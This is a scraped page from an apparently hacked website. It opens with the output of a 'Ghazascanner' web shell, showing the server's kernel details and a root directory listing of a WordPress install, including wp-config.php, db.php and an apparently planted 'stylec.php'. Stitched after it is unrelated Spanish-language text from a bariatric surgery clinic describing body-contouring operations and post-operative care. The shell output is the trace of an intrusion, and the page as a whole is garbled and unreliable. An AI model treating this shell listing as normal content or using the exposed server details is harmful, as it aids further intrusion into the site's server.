@Ghazascanner_2019runbot


server :Linux c142b.dattaweb.com 3.10.0-1160.31.1.el7.x86_64 #1 SMP Thu Jun 10 13:32:12 UTC 2021 x86_64
Name Size Permissions Options
cgi-bin
-- drwxr-xr-x
css
-- drwxr-xr-x
curriculum
-- drwxr-xr-x
img
-- drwxr-xr-x
includes
-- drwxr-xr-x
wp-admin
-- drwxr-xr-x
wp-content
-- drwxr-xr-x
wp-includes
-- drwxr-xr-x
.htaccess
1.402 KB -rw-r--r--
db.php
2.26 KB -rw-r--r--
google9567cb57eaa7476d.html
0.052 KB -rw-r--r--
index.php
12.73 KB -r--r--r--
license.txt
19.448 KB -rw-r--r--
readme.html
7.174 KB -rw-r--r--
robots.txt
0.953 KB -rw-r--r--
stylec.php
12.73 KB -rw-r--r--
wp-activate.php
6.997 KB -rw-r--r--
wp-blog-header.php
0.343 KB -rw-r--r--
wp-comments-post.php
2.273 KB -rw-r--r--
wp-config-sample.php
2.934 KB -rw-r--r--
wp-config.php
4.03 KB -rw-r--r--
wp-cron.php
3.847 KB -rw-r--r--
wp-links-opml.php
2.438 KB -rw-r--r--
wp-load.php
3.809 KB -rw-r--r--
wp-login.php
44.397 KB -rw-r--r--
wp-mail.php
8.31 KB -rw-r--r--
wp-settings.php
21.774 KB -rw-r--r--
wp-signup.php
30.95 KB -rw-r--r--
wp-signups.php
15.526 KB -rw-r--r--
wp-trackback.php
4.636 KB -rw-r--r--
xmlrpc.php
3.16 KB -rw-r--r--
@Ghazascanner_2019minishell Post-cirugía – Cirugía Bariátrica Rivera

Post-cirugía

Remodelación del contorno corporal
Se denomina así al conjunto de técnicas quirúrgicas empleadas para el tratamiento de las secuelas corporales secundarias al adelgazamiento masivo.
Las grandes pérdidas de peso que sigueN a la cirugía bariátrica determina en muchos pacientes verdaderas deformaciones del contorno corporal.

Los pacientes presentarán en muchos casos flacidez y exceso de tejido dermograso en distintas regiones corporales, formación de pliegues que pueden generar irritación , mal olor y sensación de incomodidad.

La remodelación corporal vendría a ser el último escalón para lograr el objetivo de estos pacientes, corrigiendo las deformidades del contorno corporal y por consiguiente mejorando la vida diaria así como la autoestima.

CRITERIOS PARA SU INDICACIÓN

  • Un año o más de realizada la cirugía bariátrica.
  • Alcanzar el peso objetivo y no sentirse satisfecho con su apariencia.
  • Mantener un peso estable por al menos 3 meses.
  • Control de enfermedades asociadas (Diabetes, Hipertensión arterial).
  • Estudios preoperatorios con valores normales.
  • Autorización previa del equipo interdisciplinario (nutricionista, anestesista, cirujano).
Región cervico-facial
Dado el adelgazamiento acelerado tras la cirugía bariátrica a nivel de cara y cuello puede producirse un adelgazamiento de las bolsas adiposas superficiales de la cara que brindad sustentación.

Esto genera un aspecto envejecido del rostro, con aumento de surcos y
arrugas, profundización de las ojeras, pérdida de definición del reborde mandibular, exceso cutáneo con flacidez tanto en cara y cuello.

La ritidoplastia cervicofacial, popularmente conocida como lifting facial, reposiciona estos tejidos a su lugar original, elimina la flacidez y adiposidades localizadas, todo con mínimas cicatrices prácticamente imperceptibles.

A su vez para dar relleno a las áreas que lo perdieron se puede combinar con injerto de grasa del propio paciente o la utilización de rellenos reabsorbibles como es el ácido hialurónico.

Región mamaria
En mujeres que han perdido peso las mamas pierden tejido graso, estas caen de su posición normal dejando un polo superior vacío totalmente, flácidas y de aspecto senil.

Mastopexia es el procedimiento para la corrección de estas alteraciones y las técnicas deben adaptarse a cada caso en particular. Consiste en resecar el exceso de piel y dejar una forma, simetría y volumen adecuados, para esto último puede utilizarse la propia glándula de la paciente o implantes mamarios de silicona.

En los hombres la ginecomastia o lipomastia es también frecuente, ya que esa zona crece en conjunto con el abdomen cuando el paciente esta obeso y una vez que pierde peso, aparece la flacidez, deformidad y sectores de grasa localizada persistentes. De acuerdo a cada caso puede tratarse solo con lipoaspiración o asociando resección de piel y tejido graso con lipoaspiración, permitiendo reubicar el complejo areola pezón en su correcta posición, dejando una forma más plana y masculina al tórax del paciente.

Brazos
Los brazos luego del adelgazamiento masivo presentarán flacidez y exceso de piel.Esta deformidad puede abarcar tanto la cara interna e inferior de brazo, la axila y hasta la piel del tórax lateral.

Braquioplastia es el procedimiento mediante el cual se reseca el exceso cutáneo de estas regiones asociando lipoaspiración para un mejor resultado estético.

Dorso
El dorso o espalda alta se presenta como un problema en muchos pacientes.
Muchas veces se observa flacidez, pliegues y adiposidad localizada en la zona, formando “rollos’’ que causan disconfort para vestirse así como estéticamente.

Esta zona puede tratarse mediante lipoaspiración, o en casos más severos mediante resección directa del exceso cutáneo, escondiendo la cicatriz en la línea del soutien en el caso de la mujeres.

Abdomen
Abdominoplastia es el procedimiento donde se elimina el exceso de grasa y piel del abdomen, reparando además los músculos rectos abdominales que se encuentran debilitados y separados uno del otro. Este tratamiento mejora francamente el aspecto del abdomen y la cintura tanto en lo estético como funcional.

Existen distintos tipos de incisiones de acuerdo a cada caso particular (clásica, con cicatriz extendida a dorso, circunferencial o en Flor de Liz).
La cicatriz de la cirugía será del tamaño del problema y de lo extenso de la flacidez. Se realiza cicatriz horizontal en casos donde la piel sobrante sea en sentido horizontal.

Cuando en el abdomen central exista flacidez, donde deba disminuirse el ancho del abdomen será necesario tratar esa zona y realizar la resección de piel y tejido adiposo en sentido vertical o en “flor de lis”, que significa asociar el componente de cicatriz vertical a la cicatriz horizontal original.
En los casos donde la espalda baja esté deforme y flácida, se extiende la cicatriz en forma
circunferencial y de esa manera se trata también la parte externa de los muslos y la flacidez
de los glúteos.

Muslos
Cruroplastia es el procedimiento que corrige la zona de los muslos se trata con una cicatriz en la parte interna de la pierna, que se continúa hasta la ingle pero no la recorre, sino que se ubica a los lados del área genital; de esta manera las cicatrices se ocultan muy bien y se logra estirar en simultáneo la zona inguinal y todo el muslo.

La incisión sólo en el pliegue inguinal, se utiliza en casos de deformaciones leves ya que no corrige la flacidez de la zona inguinal ni del muslo y suele dejar una cicatriz que se ensancha. Ubicando la cicatriz en la zona paragenital y en la cara interna del muslo, se distribuye bien la piel y se esconden las cicatrices.

Postoperatorio
Si bien algunos aspectos del postoperatorio podrán variar de acuerdo a la región tratada en líneas generales los pacientes luego de la cirugía requerirán internación hospitalaria de 12 a 24 horas. En estas primeras horas se probará la tolerancia a la vía oral y se estimulará al paciente a deambular en las primeras horas.

Drenajes: puede ser necesario dejar drenajes aspirativos, para evitar acumulación de colecciones líquidas, por un mínimo de 48 horas hasta en algunos casos 10 días, de acuerdo a la evolución clínica.

Se indicaran analgésicos vo y plan antibiótico como profilaxis en el postoperatorio inmediato. En regiones como abdomen, muslos y brazos los pacientes deberán utilizar fajas compresivas de 4 a 6 semanas las 24 horas del día.

El reposo laboral necesario será de 3 a 4 semanas de acuerdo al procedimiento.